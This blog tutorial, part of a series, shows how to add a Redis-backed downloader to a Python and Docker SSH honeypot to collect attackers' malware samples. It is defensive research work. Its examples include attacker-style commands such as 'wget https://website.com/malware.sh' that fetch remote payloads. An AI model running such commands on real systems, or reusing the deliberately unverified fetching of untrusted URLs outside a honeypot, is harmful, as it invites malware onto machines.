SSH honeypot, deployed in the wild, collecting and sharing data

How to build an SSH honeypot in Python and Docker - Part 2

14 Aug 2021 • 9 min read


In this blog post I'll be extending the SSH honeypot we built in Part 1 (see How to build an SSH honeypot in Python and Docker - Part 1) to download any files the honeypot receives -- a great way to collect malware samples to analyse.

The main features we'll be adding to the new honeypot are:

  • A downloader - to download requested files from attackers
  • Docker-compose - to manage multiple Docker containers
  • Redis - to handle the download queue


Architecture

We need to adjust the architecture of our honeypot so the file download function can run separately from the main honeypot. Our main reason for separating these services is to protect the honeypot from a denial-of-service (DoS) attack if it gets flooded with download requests.

Now, by separating the honeypot and download services, we introduce a flaw: an attacker will notice immediately that their recently downloaded file isn't on the honeypot. Surely that defeats the point of building a convincing honeypot?

Well, our main goal is to collect malware samples. Once an attacker has sent malware to our honeypot, our goal has been achieved. Also, it may be that our honeypot is mainly attacked by bots that upload malware to the honeypot, execute the malware, then disconnect. Most of these bots probably won't notice if there's no response to their malware; they're playing a numbers game.

So, back to the honeypot's architecture. To split the honeypot and downloader into separate services we'll adopt a microservices architecture: we'll run the honeypot in one Docker container and the downloader in another.

To manage our containers we'll use Docker Compose: a tool for running multi-container applications on Docker. To manage the queue of URLs to download, we'll use Redis: an in-memory database (it's a bit like a Python dictionary).
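The Redis commands we'll rely on map closely onto familiar Python structures, which is worth keeping in mind before we wire anything up. This sketch uses plain Python stand-ins (a deque and a dict, so it runs without a Redis server) to mirror the four Redis commands the honeypot will use:

```python
from collections import deque

# Redis LPUSH/LPOP on a list behave like pushing/popping one end of a deque:
download_queue = deque()
download_queue.appendleft("https://website.com/malware.sh")  # r.lpush("download_queue", url)
url = download_queue.popleft() if download_queue else None   # r.lpop("download_queue")
print(url)  # https://website.com/malware.sh

# Redis HEXISTS/HSET on a hash behave like membership tests and assignment on a dict:
checked_urls = {}
already_seen = url in checked_urls            # r.hexists("checked_urls", url)
checked_urls[url] = "sha256-digest-goes-here" # r.hset("checked_urls", url, digest)
print(already_seen)  # False
```

The real code swaps the deque and dict for redis-py calls, which gives us the same semantics but shared across containers.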

Prerequisites

Just like in Part 1, we need to set up a requirements.txt file. We also need to create an environment file (.env) and a Docker Compose config file (docker-compose.yml).

Requirements.txt

First, we need to update our requirements.txt file to include the additional libraries we'll be using. We'll keep paramiko (as in Part 1), and add redis (the in-memory database that will hold our download queue) and requests (to retrieve remote files). So, the new requirements.txt file looks like this:

paramiko
redis
requests


Environment file

Next, we need to create an environment file, called .env. This is where we'll store details for the Redis database:

REDIS_HOST=ssh_honeypot_redis_db
REDIS_PORT=6379
REDIS_PASSWORD=password
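These variables reach each container's environment via the env_file entries in docker-compose.yml, and our Python code will read them with os.environ. A small sketch of that (the fallback defaults here are my own illustration, not part of the honeypot):

```python
import os

# These names match the .env file; the defaults are only fallbacks for local runs
REDIS_HOST = os.environ.get("REDIS_HOST", "localhost")
REDIS_PORT = int(os.environ.get("REDIS_PORT", "6379"))  # cast to int for the Redis client
REDIS_PASSWORD = os.environ.get("REDIS_PASSWORD", "")

print(REDIS_HOST, REDIS_PORT)
```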


Docker compose

As I mentioned, we'll use docker-compose to manage our Docker containers. In Part 1 of this tutorial we ran a single Docker container and used the docker command to build, start, and stop it. But, for our improved honeypot, we'll run our malware-collecting extension in a second Docker container. We'll also run Redis in its own container.

Docker Compose uses YAML configuration files. So, let's define 3 services (the honeypot, the downloader, and the Redis database) in our docker-compose.yml file:

version: '3.7'

services:
            
    ssh_honeypot:
        container_name: ssh_honeypot
        build:
          context: .
          dockerfile: Dockerfile
        image: basic_ssh_honeypot
        tty: true  
        command: python ssh_honeypot.py --port 2222
        volumes:
            - .:/usr/src/app
        env_file:
            - ./.env
        ports:
            - 2224:2222
        environment:
            - CHOKIDAR_USEPOLLING=true
            
    ssh_honeypot_downloader:
        container_name: ssh_honeypot_downloader
        build:
          context: .
          dockerfile: Dockerfile
        image: ssh_honeypot_downloader
        tty: true  
        command: python ssh_honeypot_downloader.py
        volumes:
            - .:/usr/src/app
        env_file:
            - ./.env
        environment:
            - CHOKIDAR_USEPOLLING=true
            
    ssh_honeypot_redis_db:
        container_name: ssh_honeypot_redis_db
        image: redis:6.0.7-alpine
        command: redis-server --requirepass password 
        env_file:
            - ./.env

As you can see, we've named our containers ssh_honeypot, ssh_honeypot_downloader, and ssh_honeypot_redis_db.

Detecting URLs

The first thing our improved honeypot needs to do is detect when an attacker tries to download a URL. An attacker will usually call the wget command to download a file (e.g. wget https://website.com/malware.sh). But there are other ways to download files -- so relying on the wget command alone might not capture all file requests. Instead, we'll use regular expressions to pattern-match URLs (e.g. https://website.com/malware.sh) and IP-based URLs (e.g. 127.0.0.1/malware.sh).

We'll add the function detect_url(command, client_ip) to the main SSH honeypot, in the file ssh_honeypot.py:

def detect_url(command, client_ip):
    regex = r"(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:'\".,<>?«»“”‘’]))"
    result = re.findall(regex, command)
    if result:
        for ar in result:
            for url in ar:
                if url != '':
                    logging.info('New URL detected from {}: {}'.format(client_ip, url))
                    r.lpush("download_queue", url)

    ip_regex = r"([0-9]+(?:\.[0-9]+){3}\/\S*)"
    ip_result = re.findall(ip_regex, command)
    if ip_result:
        for ip_url in ip_result:
            if ip_url != '':
                logging.info('New IP-based URL detected from {}: {}'.format(client_ip, ip_url))
                r.lpush("download_queue", ip_url)
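To see what those two patterns actually catch, here's a standalone demo (no Redis or logging, just the two regexes from detect_url) run against a typical attacker command:

```python
import re

command = "wget https://website.com/malware.sh; curl 10.0.0.5/payload.bin"

# The general URL pattern (scheme- or domain-based URLs)
url_regex = r"(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:'\".,<>?«»“”‘’]))"
# re.findall returns a tuple per match (one entry per capture group);
# we keep the non-empty entries, as detect_url does
urls = [url for groups in re.findall(url_regex, command) for url in groups if url]

# The IP-based pattern (catches bare-IP URLs the first regex misses,
# because it requires letters after the final dot)
ip_regex = r"([0-9]+(?:\.[0-9]+){3}\/\S*)"
ip_urls = re.findall(ip_regex, command)

print(urls)     # ['https://website.com/malware.sh']
print(ip_urls)  # ['10.0.0.5/payload.bin']
```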

We'll call detect_url(command, client_ip) from the function handle_cmd() that we created in Part 1 of this tutorial.
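The hook itself is a one-line addition. Here's a simplified, self-contained sketch of the wiring (the handle_cmd body, the stand-in detect_url, and the FakeChannel are illustrative, not the exact Part 1 code):

```python
detected = []

def detect_url(command, client_ip):
    # stand-in for the real detect_url above: just record what was seen
    detected.append((client_ip, command))

def handle_cmd(cmd, chan, ip):
    """Respond to a command typed by the attacker (simplified sketch of Part 1)."""
    response = ""

    # new in Part 2: inspect every command for URLs to queue for the downloader
    detect_url(cmd, ip)

    if cmd.startswith("ls"):
        response = "users.txt"

    if response:
        chan.send(response + "\r\n")

class FakeChannel:
    """Minimal stand-in for a paramiko channel, for demonstration only."""
    def __init__(self):
        self.sent = []
    def send(self, data):
        self.sent.append(data)

chan = FakeChannel()
handle_cmd("wget https://website.com/malware.sh", chan, "1.2.3.4")
print(detected)  # [('1.2.3.4', 'wget https://website.com/malware.sh')]
```

The important point is that detect_url is called on every command, before any fake response is chosen, so URLs are queued even for commands the honeypot doesn't recognise.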

The downloader

Now to create the main downloader. This service will consist of 2 parts:

  1. Pop URLs from the Redis download queue
  2. Retrieve URL contents, store in a ZIP archive, then save to disk

Pop URL from queue

Popping URLs from the Redis download queue is fairly straightforward. We'll just run a while loop to check for new URLs in the queue every second:

while True:

    try:
        url_to_download = r.lpop("download_queue")
        if url_to_download:
            downloadURL(url_to_download)

    except Exception as err:
        print('*** Download URL failed: {}'.format(err))
        logging.info('*** Download URL failed: {}'.format(err))
        traceback.print_exc()

    sleep(1)

The variable url_to_download will be None if the queue is empty. So, essentially, the loop does nothing until a URL appears in the queue.

Download URL

Now to actually download files from the URL queue. We'll start this function by checking whether the requested URL has been downloaded before (there's no point in downloading a URL twice). We'll use a Redis hash for this:

if not r.hexists("checked_urls", url):

The Redis method hexists checks if the given field (url) exists in the hash checked_urls. The first time we check a URL it won't be in the hash, so we move on to the next stage.

To download a URL, we'll use Python's requests library:

response = requests.get(url, verify=False, timeout=10)

Putting the downloadURL function together looks like this:

def downloadURL(url):

    # make sure we haven't already checked this URL
    if not r.hexists("checked_urls", url):

        a = urlparse(url)   
        file_name = os.path.basename(a.path)
        logging.info('Downloading URL: {}'.format(url))
        m_sha256 = hashlib.sha256()
        file_digest = ''
        chunks = []

        try:
            response = requests.get(url, verify=False, timeout=10)

            if response.status_code == 200:
                for data in response.iter_content(8192):
                    m_sha256.update(data)
                    chunks.append(data)

                file_digest = m_sha256.hexdigest()
                directory = "uploaded_files"
                if not os.path.exists(directory):
                    os.makedirs(directory)

                zip_filename = directory+"/"+file_digest+'.zip'

                if not os.path.isfile(zip_filename):
                    file_contents = b''.join(chunks)
                    with zipfile.ZipFile(zip_filename, mode='w') as myzip:
                        myzip.writestr(file_name, file_contents)
                    
            else:
                print("Did not receive http 200 for requested URL. Received: ", response.status_code)
                logging.info('Did not receive http 200 for requested URL. Received {}'.format(response.status_code))

        except Exception as err:
            print('*** Download URL failed: {}'.format(err))
            logging.info('*** Download URL failed: {}'.format(err))
            traceback.print_exc()

        # add url to redis set so we don't check it again (prevents honeypot from becoming a DoS weapon)
        r.hset("checked_urls", url, file_digest)

We're using Python's hashlib library to calculate the URL's SHA-256 digest (hashlib.sha256()). We then add the file to a ZIP archive, and save the file as [SHA-256].zip into the directory uploaded_files.
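A quick way to sanity-check a collected sample is to unzip it and confirm that the member's SHA-256 matches the archive's filename. This sketch builds a dummy sample the same way the downloader does (in a temp directory, so it's self-contained):

```python
import hashlib
import os
import tempfile
import zipfile

# Build a dummy sample the same way the downloader does
contents = b"#!/bin/sh\necho pwned\n"
digest = hashlib.sha256(contents).hexdigest()

with tempfile.TemporaryDirectory() as directory:
    zip_path = os.path.join(directory, digest + ".zip")
    with zipfile.ZipFile(zip_path, mode="w") as myzip:
        myzip.writestr("malware.sh", contents)

    # Verify: the digest of the archived file should match the filename
    with zipfile.ZipFile(zip_path) as myzip:
        recovered = myzip.read("malware.sh")

    name_digest = os.path.basename(zip_path)[:-len(".zip")]
    ok = hashlib.sha256(recovered).hexdigest() == name_digest
    print(ok)  # True
```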

The finished Python file

So, the complete Python file for our downloader (ssh_honeypot_downloader.py) is:

#!/usr/bin/env python
import sys
import os
import traceback
import logging
import redis
import requests
import urllib3
import hashlib
import zipfile
from time import sleep
from urllib.parse import urlparse

logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    level=logging.INFO,
    filename='ssh_honeypot_downloader.log')

# disable InsecureRequestWarnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

REDIS_HOST=os.environ.get("REDIS_HOST")
REDIS_PORT=os.environ.get("REDIS_PORT")
REDIS_PASSWORD=os.environ.get("REDIS_PASSWORD")
r = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, decode_responses=True)

def downloadURL(url):

    # make sure we haven't already checked this URL
    if not r.hexists("checked_urls", url):

        a = urlparse(url)   
        file_name = os.path.basename(a.path)
        logging.info('Downloading URL: {}'.format(url))
        m_sha256 = hashlib.sha256()
        file_digest = ''
        chunks = []

        try:
            response = requests.get(url, verify=False, timeout=10)

            if response.status_code == 200:
                for data in response.iter_content(8192):
                    m_sha256.update(data)
                    chunks.append(data)

                file_digest = m_sha256.hexdigest()
                directory = "uploaded_files"
                if not os.path.exists(directory):
                    os.makedirs(directory)

                zip_filename = directory+"/"+file_digest+'.zip'

                if not os.path.isfile(zip_filename):
                    file_contents = b''.join(chunks)
                    with zipfile.ZipFile(zip_filename, mode='w') as myzip:
                        myzip.writestr(file_name, file_contents)
                    
            else:
                print("Did not receive http 200 for requested URL. Received: ", response.status_code)
                logging.info('Did not receive http 200 for requested URL. Received {}'.format(response.status_code))

        except Exception as err:
            print('*** Download URL failed: {}'.format(err))
            logging.info('*** Download URL failed: {}'.format(err))
            traceback.print_exc()

        # add url to redis set so we don't check it again (prevents honeypot from becoming a DoS weapon)
        r.hset("checked_urls", url, file_digest)

print("Waiting for URL to download...")
while True:

    try:
        url_to_download = r.lpop("download_queue")
        if url_to_download:
            downloadURL(url_to_download)

    except Exception as err:
        print('*** Download URL failed: {}'.format(err))
        logging.info('*** Download URL failed: {}'.format(err))
        traceback.print_exc()

    sleep(1)


Running the honeypot

We've now finished adding the downloader to our SSH honeypot. There are two things we need to do before we can run it (they're the same as in Part 1, so I'll presume you've already done them):

  • Port forwarding (e.g. port 22 to 2222 -- for improved security)
  • Generate the server's key

So, with port forwarding and the server's key setup, the honeypot's directory should contain these files:

  • .env
  • docker-compose.yml
  • Dockerfile
  • requirements.txt
  • server.key
  • public.pub
  • ssh_honeypot.py
  • ssh_honeypot_downloader.py

Once you've checked all those files are in place, go ahead and build the docker images with:

docker-compose build

Then, run the honeypot with:

docker-compose up

Just like in Part 1, you can connect to the honeypot to test everything's working properly with:

ssh test@[honeypot-ip]

Your test connection should appear in the log file ssh_honeypot.log.

Collecting malware samples

Any files uploaded to the honeypot will go in the directory uploaded_files. But, how do we know if these files are malicious? Well, we can presume any files uploaded to the honeypot are likely to be dangerous (due to the nature of users connecting to SSH honeypots).

You can check a file's SHA-256 digest on VirusTotal. The digest is the filename (minus the .zip extension). Bear in mind, though, that many antivirus vendors fail to detect certain cryptomining malware (e.g. because the malware abuses legitimate mining software).
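For example, to list the digests ready for a VirusTotal lookup, you can strip the .zip extension from each filename in uploaded_files. A sketch (using a throwaway directory and a placeholder digest -- the SHA-256 of an empty file -- so it's self-contained):

```python
import os
import tempfile

with tempfile.TemporaryDirectory() as uploaded_files:
    # simulate one collected sample; a real run would scan ./uploaded_files
    sample = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855.zip"
    open(os.path.join(uploaded_files, sample), "wb").close()

    digests = [f[:-len(".zip")] for f in os.listdir(uploaded_files)
               if f.endswith(".zip")]
    print(digests[0])  # the SHA-256 to look up on VirusTotal
```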

GitHub repo

All the files for this SSH honeypot are available on my GitHub repo at: github.com/sjbell/basic_ssh_honeypot_with_downloader.

Main image credit: "A bundle of optical fibers" by Denny Muller. Logos for Python and Docker.

About the author

Simon Bell is an award-winning Cyber Security Researcher, Software Engineer, and Web Security Specialist. Simon's research papers have been published internationally, and his findings have featured in Ars Technica, The Hacker News, PC World, among others. He founded Secure Honey, an open-source honeypot and threat intelligence project, in 2013. He has a PhD in Cyber Security from Royal Holloway's world-leading Information Security Group.

Follow Simon on Twitter: @SimonByte